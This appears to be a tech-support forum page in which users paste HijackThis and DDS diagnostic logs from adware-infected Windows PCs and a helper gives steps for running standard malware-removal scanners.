Processor: Intel(R) Pentium(R) Dual CPU T3400 @ 2.16GHz | CPU | 2161/667mhz
.
==== Disk Partitions =========================
.
C: is FIXED (NTFS) - 140 GiB total, 81.792 GiB free.
D: is CDROM ()
.
==== Disabled Device Manager Items =============
.
Class GUID: {4d36e972-e325-11ce-bfc1-08002be10318}
Description: Atheros AR5007EG Wireless Network Adapter
Device ID: PCI\VEN_168C&DEV_001C&SUBSYS_7128144F&REV_01\4&C8C337F&0&00E1
Manufacturer: Atheros Communications Inc.
Name: Atheros AR5007EG Wireless Network Adapter
PNP Device ID: PCI\VEN_168C&DEV_001C&SUBSYS_7128144F&REV_01\4&C8C337F&0&00E1
Service: athr
.
==== System Restore Points ===================
.
.
==== Installed Programs ======================
.
64 Bit HP CIO Components Installer
7-Zip 9.20 (x64 edition)
Adobe Flash Player 13 ActiveX
Adobe Flash Player 14 Plugin
Adobe Reader X (10.1.10)
AIO_CDB_ProductContext
AIO_CDB_Software
AIO_CDB_ToolboxIni64
AIO_Scan
Atheros Driver Installation Program
BufferChm
CD/DVD Drive Acoustic Silencer
Cisco EAP-FAST Module
Cisco LEAP Module
Cisco PEAP Module
Copy
CVE-2012-4792
Destinations
DeviceManagementQFolder
DocProc
DocProcQFolder
DVD MovieFactory for TOSHIBA
ESET Online Scanner v3
eSupportQFolder
F300
F300_Help
F300Trb
Fax
Ghostery IE Plugin
Google Update Helper
HD Tune Pro 5.00
Hotfix for Microsoft .NET Framework 3.5 SP1 (KB953595)
Hotfix for Microsoft .NET Framework 3.5 SP1 (KB958484)
HP Imaging Device Functions 8.0
HP OCR Software 8.0
HP Photosmart Essential
HP Photosmart, Officejet, PSC and Deskjet All-In-One Driver Software 8.0.B
HP Solution Center 8.0
HPProductAssistant
Intel(R) Graphics Media Accelerator Driver
Intel® Matrix Storage Manager
Java 7 Update 55
Java Auto Updater
Malwarebytes Anti-Malware version 1.75.0.1300
Microsoft .NET Framework 3.5 SP1
Microsoft .NET Framework 4.5.1
Microsoft Office 2000 SR-1 Professional
Microsoft Security Client
Microsoft Security Essentials
Microsoft Visual C++ 2005 Redistributable
Microsoft Visual C++ 2005 Redistributable (x64)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161
Microsoft XML Parser
Mozilla Firefox 30.0 (x86 en-US)
Mozilla Maintenance Service
MSXML 4.0 SP2 (KB941833)
MSXML 4.0 SP2 (KB954430)
MSXML 4.0 SP2 (KB973688)
QuickBooks Financial Center
Realtek 8169 8168 8101E 8102E Ethernet Driver
Realtek High Definition Audio Driver
Realtek USB 2.0 Card Reader
SAMSUNG Intelli-studio
Scan
Security Update for Microsoft .NET Framework 3.5 SP1 (KB2604111)
Security Update for Microsoft .NET Framework 3.5 SP1 (KB2736416)
Security Update for Microsoft .NET Framework 3.5 SP1 (KB2840629)
Security Update for Microsoft .NET Framework 3.5 SP1 (KB2861697)
Security Update for Microsoft .NET Framework 4.5.1 (KB2898869)
Security Update for Microsoft .NET Framework 4.5.1 (KB2901126)
Security Update for Microsoft .NET Framework 4.5.1 (KB2931368)
Security Update for Windows Media Encoder (KB2447961)
SolutionCenter
Status
SUPERAntiSpyware
swMSM
Synaptics Pointing Device Driver
Toolbox
TOSHIBA Assist
TOSHIBA Desktop Links
TOSHIBA Disc Creator
TOSHIBA DVD PLAYER
TOSHIBA Extended Tiles for Windows Mobility Center
TOSHIBA Hardware Setup
TOSHIBA Recovery Disc Creator
TOSHIBA Service Station
TOSHIBA Software Modem
TOSHIBA Supervisor Password
TOSHIBA Value Added Package
TrayApp
UnloadSupport
Update for Microsoft .NET Framework 3.5 SP1 (KB963707)
WebReg
Windows Driver Package - TOSHIBA (FwLnk) System (11/19/2006 1.0.0.3)
Windows Media Encoder 9 Series
.
==== End Of File ===========================

GMER would not run or let me uncheck the IAT/EAT box, as it closed as soon as I acknowledged it could not run.

Very Slow and TONS of pages opening

I am writing this for a friend because he can't even get his computer to function well enough to do this. It is running very slowly and opening tons of pages asking him to download security things or software updates that seem to be bogus. I took a quick peek and it looks like he has a lot of malware going on. He was able to get an HJT log and the two DDS logs, but the third one, for the rootkit, he was never able to complete. I will try to help him do that in the morning and send it then. Here are the logs he was able to get.

Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 3:24:29 PM, on 6/24/2014
Platform: Windows Vista SP1 (WinNT 6.00.1905)
MSIE: Internet Explorer v7.00 (7.00.6001.18385)
Boot mode: Normal

Running processes:
C:\Windows\Explorer.EXE
C:\Windows\system32\Dwm.exe
C:\Windows\system32\taskeng.exe
C:\Program Files\Microsoft Security Client\msseces.exe
C:\Program Files\Windows Sidebar\sidebar.exe
C:\Windows\ehome\ehtray.exe
C:\Users\Owner\AppData\Roaming\InstallX Search Protect for Yahoo\searchprotector.exe
C:\Windows\ehome\ehmsas.exe
C:\Windows\System32\wsqmcons.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Users\Owner\Downloads\HijackThis.exe

O23 - Service: Yahoo! Updater (YahooAUService) - Yahoo! Inc. - C:\Program Files\Yahoo!\SoftwareUpdate\YahooAUService.exe

--
End of file - 1002 bytes

Does that look like it could be all of the HJT log? It seems like it should have been longer.

Here are the two DDS logs.

DDS (Ver_2012-11-20.01) - NTFS_x86
Internet Explorer: 7.0.6001.18385
Run by Owner at 15:31:47 on 2014-06-24
.
============== Running Processes ================
.
C:\Windows\system32\wininit.exe
C:\Windows\system32\lsm.exe
c:\Program Files\Microsoft Security Client\MsMpEng.exe
C:\Windows\system32\SLsvc.exe
C:\Windows\System32\spoolsv.exe
C:\Program Files\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\Program Files\Highlightly\Service\hlsvc.exe
C:\Windows\system32\SearchIndexer.exe
C:\Program Files\Yahoo!\SoftwareUpdate\YahooAUService.exe
C:\Windows\system32\taskeng.exe
C:\Program Files\Consumer Input\Update\ConsumerInputUpdate.exe
C:\Program Files\Google\Update\GoogleUpdate.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
C:\Program Files\Consumer Input\Update\ConsumerInputUpdate.exe
C:\Windows\system32\taskeng.exe
C:\Windows\Explorer.EXE
C:\Windows\system32\Dwm.exe
C:\Windows\system32\taskeng.exe
C:\Program Files\Google\Update\GoogleUpdate.exe
C:\Program Files\Consumer Input\Update\ConsumerInputUpdate.exe
C:\Program Files\Consumer Input\Monitoring\dca-monitoring.exe
C:\Program Files\Consumer Input\Update\ConsumerInputUpdate.exe
C:\Program Files\Microsoft Security Client\msseces.exe
C:\Program Files\Windows Sidebar\sidebar.exe
C:\Windows\ehome\ehtray.exe
C:\Users\Owner\AppData\Roaming\InstallX Search Protect for Yahoo\searchprotector.exe
C:\Windows\system32\mcbuilder.exe
C:\Windows\ehome\ehmsas.exe
C:\Windows\System32\wsqmcons.exe
C:\Program Files\Google\Update\GoogleUpdate.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Update\GoogleUpdate.exe
C:\Users\Owner\Downloads\HijackThis.exe
C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
C:\Windows\system32\SearchProtocolHost.exe
C:\Windows\system32\SearchFilterHost.exe
C:\Windows\system32\consent.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k rpcss
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Windows\system32\svchost.exe -k imgsvc
C:\Windows\System32\svchost.exe -k WerSvcGroup
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxp://www.inbox.com/homepage.aspx?tbid=82047&lng=en
uSearch Bar = hxxp://www2.inbox.com/search/dispatcher.aspx?tp=aus&qkw=%s&tbid=%tb_id&%language
uURLSearchHooks: {D3D233D5-9F6D-436C-B6C7-E63F77503B30} - <orphaned>
uURLSearchHooks: YTNavAssistPlugin Class: {81017EA9-9AA8-4A6A-9734-7AF40E7D593F} - c:\program files\yahoo!\companion\installs\cpn1\yt.dll
BHO: &Yahoo! Toolbar Helper: {02478D38-C3F9-4efb-9B51-7695ECA05670} - c:\program files\yahoo!\companion\installs\cpn1\yt.dll
BHO: Consumer Input DCA BHO: {B49699FC-1665-4414-A1CB-C4A2A4A13EEC} - c:\program files\consumer input\internetexplorer\dca-bho.dll
TB: Yahoo! Toolbar: {EF99BD32-C1FB-11D2-892F-0090271D4F88} - c:\program files\yahoo!\companion\installs\cpn1\yt.dll
uRun: [Sidebar] c:\program files\windows sidebar\sidebar.exe /autoRun
uRun: [WindowsWelcomeCenter] rundll32.exe oobefldr.dll,ShowWelcomeCenter
uRun: [ehTray.exe] c:\windows\ehome\ehTray.exe
uRun: [InstallX Search Protect for Yahoo] "c:\users\owner\appdata\roaming\installx search protect for yahoo\searchprotector.exe"
mRun: [Windows Defender] c:\program files\windows defender\MSASCui.exe -hide
mRun: [MSC] "c:\program files\microsoft security client\msseces.exe" -hide -runkey
mRun: [Adobe ARM] "c:\program files\common files\adobe\arm\1.0\AdobeARM.exe"
mPolicies-System: EnableUIADesktopToggle = dword:0
DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} - hxxp://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
TCP: NameServer = 192.168.1.254
TCP: Interfaces\{61564412-C2C4-4DFA-8A8A-D2F3F4090F46} : DHCPNameServer = 192.168.1.254
Notify: igfxcui - igfxdev.dll
AppInit_DLLs=
LSA: Security Packages = kerberos msv1_0 schannel wdigest tspkg
mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "c:\program files\google\chrome\application\33.0.1750.146\installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
.
============= SERVICES / DRIVERS ===============
.
R? consumerinput_updatem;ConsumerInput Update Service (consumerinput_updatem)
S? consumerinput_update;ConsumerInput Update Service (consumerinput_update)
S? hlnfd;hlnfd
S? hlsvc;Highlightly Client Service
S? MpFilter;Microsoft Malware Protection Driver
S? SSPORT;SSPORT
.
=============== File Associations ===============
.
FileExt: .exe: exefile=%1" %*
.
=============== Created Last 30 ================
.
2014-06-24 18:12:19 -------- d-----w- C:\PerfLogs
2014-06-24 18:00:00 -------- d-----w- C:\e68a0837cbe68956e898c72406bd1d
2014-06-24 14:49:10 -------- d-----w- c:\program files\easyoToShop
2014-06-23 16:16:10 -------- d-----w- C:\377e6bbe4c1bb407f10663d9eac049c5
2014-06-23 16:03:02 8140904 ----a-w- c:\programdata\microsoft\microsoft antimalware\definition updates\{687c3d5d-996c-43fc-a842-747754aad8b8}\mpengine.dll
2014-06-23 15:46:13 -------- d-----w- C:\c3c7401f36417f6799366670
2014-06-20 15:18:52 -------- d-----w- C:\204bf2db0fe5fe5e2c
2014-06-20 15:04:46 8140904 ----a-w- c:\programdata\microsoft\microsoft antimalware\definition updates\backup\mpengine.dll
2014-06-13 16:56:46 -------- d-----w- C:\d71c225c8b6743ad084f865e3855fdba
2014-06-05 12:14:50 -------- d-----w- C:\ce9efcad6324db144db301d0fd2230
.
==================== Find3M ====================
.
2014-06-24 17:05:23 101888 ----a-w- c:\windows\system32\ifxcardm.dll
2014-06-24 17:04:28 82432 ----a-w- c:\windows\system32\axaltocm.dll
.
============= FINISH: 15:47:43.83 ===============


.
UNLESS SPECIFICALLY INSTRUCTED, DO NOT POST THIS LOG.
IF REQUESTED, ZIP IT UP & ATTACH IT
.
DDS (Ver_2012-11-20.01)
.
Microsoft® Windows Vista™ Home Premium
Boot Device: \Device\HarddiskVolume1
Install Date: 5/18/2012 2:21:54 PM
System Uptime: 6/24/2014 2:18:24 PM (1 hours ago)
.
Motherboard: ACER | | EG31M
Processor: Intel(R) Core(TM)2 Duo CPU E4500 @ 2.20GHz | CPU 1 | 2200/200mhz
.
==== Disk Partitions =========================
.
C: is FIXED (NTFS) - 75 GiB total, 56.959 GiB free.
D: is CDROM ()
.
==== Disabled Device Manager Items =============
.
Class GUID: {4d36e96f-e325-11ce-bfc1-08002be10318}
Description: Microsoft PS/2 Mouse
Device ID: ACPI\PNP0F03\4&19BC08A1&0
Manufacturer: Microsoft
Name: Microsoft PS/2 Mouse
PNP Device ID: ACPI\PNP0F03\4&19BC08A1&0
Service: i8042prt
.
==== System Restore Points ===================
.
.
==== Installed Programs ======================
.
Adobe Flash Player 11 ActiveX
Adobe Reader XI (11.0.07)
Aff Packages
CCleaner
Consumer Input
Consumer Input (remove only)
Google Chrome
Google Update Helper
Highlightly
Hotfix for Microsoft .NET Framework 3.5 SP1 (KB953595)

As I said, I will try to get the 3rd log sent in the morning. Thank you in advance for your help.

HEUR:Trojan.Script.Generic

Hi and welcome.

Please download the latest version of TDSSKiller from here and save it to your Desktop.
  • Double-click on TDSSKiller.exe to run the application.
  • Then click on Change parameters in TDSSKiller.
  • Another window will appear.
  • Check all boxes then click OK.
  • Click the Start Scan button.
  • The scan should take no longer than 2 minutes.
  • If a suspicious object is detected, the default action will be Skip, click on Continue.
  • If malicious objects are found, they will show in the Scan results - Select action for found objects and offer three options.
Ensure Cure (default) is selected, then click Continue > Reboot now to finish the cleaning process.

Note: If Cure is not available, please choose Skip instead, do not choose Delete unless instructed.
  • A report will be created in your root directory, (usually C:\ folder) in the form of "TDSSKiller.[Version]_[Date]_[Time]_log.txt". Please copy and paste the contents of that file here.

Please download Farbar Recovery Scan Tool and save it to your desktop.

Note: You need to run the version compatible with your system. If you are not sure which version applies to your system download both of them and try to run them. Only one of them will run on your system, that will be the right version.
  • Double-click to run it. When the tool opens click Yes to disclaimer.
  • Make sure that under Optional Scans, there is a checkmark on Addition.txt and Shortcut.
  • Press Scan button.
  • It will make a log (FRST.txt) in the same directory the tool is run. Please copy and paste it to your reply.
  • The first time the tool is run, it also makes another two logs (Addition.txt and Shortcut.txt). Please attach these to your reply.

Very Slow and TONS of pages opening--Extremely Unstable

Hi, I am writing this for a friend, as his computer is in such bad shape that it took us almost 3 hours just to get the logs run. I still couldn't get the 3rd one done. His computer is running very slowly and sounds like it is running constantly in the background. Pages keep opening asking him to download security stuff and other software updates. In addition to this, somehow or another the only program that the computer will try to use to open files is Adobe Reader. Anyway, here are the logs that we were able to run. I will try to get the 3rd one (the one that starts with a 'g') in the morning.

Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 3:24:29 PM, on 6/24/2014
Platform: Windows Vista SP1 (WinNT 6.00.1905)
MSIE: Internet Explorer v7.00 (7.00.6001.18385)
Boot mode: Normal

Running processes:
C:\Windows\Explorer.EXE
C:\Windows\system32\Dwm.exe
C:\Windows\system32\taskeng.exe
C:\Program Files\Microsoft Security Client\msseces.exe
C:\Program Files\Windows Sidebar\sidebar.exe
C:\Windows\ehome\ehtray.exe
C:\Users\Owner\AppData\Roaming\InstallX Search Protect for Yahoo\searchprotector.exe
C:\Windows\ehome\ehmsas.exe
C:\Windows\System32\wsqmcons.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Users\Owner\Downloads\HijackThis.exe

O23 - Service: Yahoo! Updater (YahooAUService) - Yahoo! Inc. - C:\Program Files\Yahoo!\SoftwareUpdate\YahooAUService.exe

--
End of file - 1002 bytes

DDS (Ver_2012-11-20.01) - NTFS_x86
Internet Explorer: 7.0.6001.18385
Run by Owner at 15:31:47 on 2014-06-24
.
============== Running Processes ================
.
C:\Windows\system32\wininit.exe
C:\Windows\system32\lsm.exe
c:\Program Files\Microsoft Security Client\MsMpEng.exe
C:\Windows\system32\SLsvc.exe
C:\Windows\System32\spoolsv.exe
C:\Program Files\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\Program Files\Highlightly\Service\hlsvc.exe
C:\Windows\system32\SearchIndexer.exe
C:\Program Files\Yahoo!\SoftwareUpdate\YahooAUService.exe
C:\Windows\system32\taskeng.exe
C:\Program Files\Consumer Input\Update\ConsumerInputUpdate.exe
C:\Program Files\Google\Update\GoogleUpdate.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
C:\Program Files\Consumer Input\Update\ConsumerInputUpdate.exe
C:\Windows\system32\taskeng.exe
C:\Windows\Explorer.EXE
C:\Windows\system32\Dwm.exe
C:\Windows\system32\taskeng.exe
C:\Program Files\Google\Update\GoogleUpdate.exe
C:\Program Files\Consumer Input\Update\ConsumerInputUpdate.exe
C:\Program Files\Consumer Input\Monitoring\dca-monitoring.exe
C:\Program Files\Consumer Input\Update\ConsumerInputUpdate.exe
C:\Program Files\Microsoft Security Client\msseces.exe
C:\Program Files\Windows Sidebar\sidebar.exe
C:\Windows\ehome\ehtray.exe
C:\Users\Owner\AppData\Roaming\InstallX Search Protect for Yahoo\searchprotector.exe
C:\Windows\system32\mcbuilder.exe
C:\Windows\ehome\ehmsas.exe
C:\Windows\System32\wsqmcons.exe
C:\Program Files\Google\Update\GoogleUpdate.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Update\GoogleUpdate.exe
C:\Users\Owner\Downloads\HijackThis.exe
C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
C:\Windows\system32\SearchProtocolHost.exe
C:\Windows\system32\SearchFilterHost.exe
C:\Windows\system32\consent.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k rpcss
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Windows\system32\svchost.exe -k imgsvc
C:\Windows\System32\svchost.exe -k WerSvcGroup
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxp://www.inbox.com/homepage.aspx?tbid=82047&lng=en
uSearch Bar = hxxp://www2.inbox.com/search/dispatcher.aspx?tp=aus&qkw=%s&tbid=%tb_id&%language
uURLSearchHooks: {D3D233D5-9F6D-436C-B6C7-E63F77503B30} - <orphaned>
uURLSearchHooks: YTNavAssistPlugin Class: {81017EA9-9AA8-4A6A-9734-7AF40E7D593F} - c:\program files\yahoo!\companion\installs\cpn1\yt.dll
BHO: &Yahoo! Toolbar Helper: {02478D38-C3F9-4efb-9B51-7695ECA05670} - c:\program files\yahoo!\companion\installs\cpn1\yt.dll
BHO: Consumer Input DCA BHO: {B49699FC-1665-4414-A1CB-C4A2A4A13EEC} - c:\program files\consumer input\internetexplorer\dca-bho.dll
TB: Yahoo! Toolbar: {EF99BD32-C1FB-11D2-892F-0090271D4F88} - c:\program files\yahoo!\companion\installs\cpn1\yt.dll
uRun: [Sidebar] c:\program files\windows sidebar\sidebar.exe /autoRun
uRun: [WindowsWelcomeCenter] rundll32.exe oobefldr.dll,ShowWelcomeCenter
uRun: [ehTray.exe] c:\windows\ehome\ehTray.exe
uRun: [InstallX Search Protect for Yahoo] "c:\users\owner\appdata\roaming\installx search protect for yahoo\searchprotector.exe"
mRun: [Windows Defender] c:\program files\windows defender\MSASCui.exe -hide
mRun: [MSC] "c:\program files\microsoft security client\msseces.exe" -hide -runkey
mRun: [Adobe ARM] "c:\program files\common files\adobe\arm\1.0\AdobeARM.exe"
mPolicies-System: EnableUIADesktopToggle = dword:0
DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} - hxxp://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
TCP: NameServer = 192.168.1.254
TCP: Interfaces\{61564412-C2C4-4DFA-8A8A-D2F3F4090F46} : DHCPNameServer = 192.168.1.254
Notify: igfxcui - igfxdev.dll
AppInit_DLLs=
LSA: Security Packages = kerberos msv1_0 schannel wdigest tspkg
mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "c:\program files\google\chrome\application\33.0.1750.146\installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
.
============= SERVICES / DRIVERS ===============
.
R? consumerinput_updatem;ConsumerInput Update Service (consumerinput_updatem)
S? consumerinput_update;ConsumerInput Update Service (consumerinput_update)
S? hlnfd;hlnfd
S? hlsvc;Highlightly Client Service
S? MpFilter;Microsoft Malware Protection Driver
S? SSPORT;SSPORT
.
=============== File Associations ===============
.
FileExt: .exe: exefile=%1" %*
.
=============== Created Last 30 ================
.
2014-06-24 18:12:19 -------- d-----w- C:\PerfLogs
2014-06-24 18:00:00 -------- d-----w- C:\e68a0837cbe68956e898c72406bd1d
2014-06-24 14:49:10 -------- d-----w- c:\program files\easyoToShop
2014-06-23 16:16:10 -------- d-----w- C:\377e6bbe4c1bb407f10663d9eac049c5
2014-06-23 16:03:02 8140904 ----a-w- c:\programdata\microsoft\microsoft antimalware\definition updates\{687c3d5d-996c-43fc-a842-747754aad8b8}\mpengine.dll
2014-06-23 15:46:13 -------- d-----w- C:\c3c7401f36417f6799366670
2014-06-20 15:18:52 -------- d-----w- C:\204bf2db0fe5fe5e2c
2014-06-20 15:04:46 8140904 ----a-w- c:\programdata\microsoft\microsoft antimalware\definition updates\backup\mpengine.dll
2014-06-13 16:56:46 -------- d-----w- C:\d71c225c8b6743ad084f865e3855fdba
2014-06-05 12:14:50 -------- d-----w- C:\ce9efcad6324db144db301d0fd2230
.
==================== Find3M ====================
.
2014-06-24 17:05:23 101888 ----a-w- c:\windows\system32\ifxcardm.dll
2014-06-24 17:04:28 82432 ----a-w- c:\windows\system32\axaltocm.dll
.
============= FINISH: 15:47:43.83 ===============

.
UNLESS SPECIFICALLY INSTRUCTED, DO NOT POST THIS LOG.
IF REQUESTED, ZIP IT UP & ATTACH IT
.
DDS (Ver_2012-11-20.01)
.
Microsoft® Windows Vista™ Home Premium
Boot Device: \Device\HarddiskVolume1
Install Date: 5/18/2012 2:21:54 PM
System Uptime: 6/24/2014 2:18:24 PM (1 hours ago)
.
Motherboard: ACER | | EG31M
Processor: Intel(R) Core(TM)2 Duo CPU E4500 @ 2.20GHz | CPU 1 | 2200/200mhz
.
==== Disk Partitions =========================
.
C: is FIXED (NTFS) - 75 GiB total, 56.959 GiB free.
D: is CDROM ()
.
==== Disabled Device Manager Items =============
.
Class GUID: {4d36e96f-e325-11ce-bfc1-08002be10318}
Description: Microsoft PS/2 Mouse
Device ID: ACPI\PNP0F03\4&19BC08A1&0
Manufacturer: Microsoft
Name: Microsoft PS/2 Mouse
PNP Device ID: ACPI\PNP0F03\4&19BC08A1&0
Service: i8042prt
.
==== System Restore Points ===================
.
.
==== Installed Programs ======================
.
Adobe Flash Player 11 ActiveX
Adobe Reader XI (11.0.07)
Aff Packages
CCleaner
Consumer Input
Consumer Input (remove only)
Google Chrome
Google Update Helper
Highlightly
Hotfix for Microsoft .NET Framework 3.5 SP1 (KB953595)
Hotfix for Microsoft .NET Framework 3.5 SP1 (KB958484)
Intel(R) Graphics Media Accelerator Driver
MCE Software Encoder 1.1
Microsoft .NET Framework 3.5 SP1
Microsoft Security Client
Microsoft Security Essentials
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161
PE585QA-32
Software Updater version 1.8.3
Type 101
Update for Microsoft .NET Framework 3.5 SP1 (KB963707)
Windows Driver Package - Conexant (cxpl_mhd) Media (11/07/2007 6.0.104.0038)
Yahoo! Toolbar
.
==== End Of File ===========================

Thank you in advance for any help. The man that owns this computer is 80 years young!

Internet Usage Spike

My internet usage has spiked dramatically. It seems to decrease when I have my laptop off and am only using streaming devices. I've run my Kaspersky antivirus and MS bot tool but they didn't find anything. Any help would be appreciated!!


Tech Support Guy System Info Utility version 1.0.0.2
OS Version: Microsoft Windows 7 Home Premium, Service Pack 1, 64 bit
Processor: Intel(R) Core(TM) i7-2630QM CPU @ 2.00GHz, Intel64 Family 6 Model 42 Stepping 7
Processor Count: 8
RAM: 8172 Mb
Graphics Card: AMD Radeon HD 6550M, 1024 Mb
Hard Drives: C: Total - 430419 MB, Free - 56456 MB; D: Total - 31208 MB, Free - 28287 MB;
Motherboard: LENOVO, KL2
Antivirus: Kaspersky PURE 3.0, Updated and Enabled


Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 8:00:26 PM, on 6/24/2014
Platform: Windows 7 SP1 (WinNT 6.00.3505)
MSIE: Internet Explorer v11.0 (11.00.9600.17126)
Boot mode: Normal

Running processes:
C:\Users\tk\AppData\Local\Program Files\Amazon\MP3 Downloader\AmazonMP3DownloaderHelper.exe
C:\Program Files (x86)\Lenovo\Onekey Theater\OnekeySupport.exe
C:\Program Files (x86)\Lenovo\YouCam\YCMMirage.exe
C:\Program Files (x86)\CrashPlan\CrashPlanTray.exe
C:\Users\tk\AppData\Roaming\Dropbox\bin\Dropbox.exe
C:\Program Files (x86)\Kaspersky Lab\Kaspersky PURE 3.0\avp.exe
C:\Program Files\Lenovo\Lenovo SlideNav\SlidebarNavigator\SlidebarNavigator.exe
C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
C:\Program Files (x86)\iTunes\iTunesHelper.exe
C:\Program Files (x86)\BodyMedia\Sync\BodyMediaSync.exe
C:\Program Files (x86)\Mozilla Firefox\firefox.exe
C:\Program Files (x86)\Mozilla Firefox\plugin-container.exe
C:\windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_13_0_0_214.exe
C:\windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_13_0_0_214.exe
C:\Users\tk\Desktop\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/p/?LinkId=255141
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/p/?LinkId=255141
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
F2 - REG:system.ini: UserInit=userinit.exe
O2 - BHO: ContentBlockerBrowserHelperObject - {5564CC73-EFA7-4CBF-918A-5CF7FBBFFF4F} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky PURE 3.0\IEExt\ContentBlocker\ie_content_blocker_plugin.dll
O2 - BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\PROGRA~2\MICROS~1\Office14\GROOVEEX.DLL
O2 - BHO: VirtualKeyboardBrowserHelperObject - {73455575-E40C-433C-9784-C78DC7761455} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky PURE 3.0\IEExt\VirtualKeyboard\ie_virtual_keyboard_plugin.dll
O2 - BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll
O2 - BHO: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: Safe Money Plugin - {9E6D0D23-3D72-4A94-AE1F-2D167624E3D9} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky PURE 3.0\IEExt\OnlineBanking\online_banking_bho.dll
O2 - BHO: URLRedirectionBHO - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\PROGRA~2\MICROS~1\Office14\URLREDIR.DLL
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll
O2 - BHO: link filter bho - {E33CF602-D945-461A-83F0-819F76A199F8} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky PURE 3.0\IEExt\UrlAdvisor\klwtbbho.dll
O4 - HKLM\..\Run: [StartCCC] "C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" MSRun
O4 - HKLM\..\Run: [MuteSync] C:\PROGRA~2\Lenovo\LENOVO~1\MuteSync.exe
O4 - HKLM\..\Run: [VeriFaceManager] C:\Program Files (x86)\Lenovo\VeriFace\PManage.exe
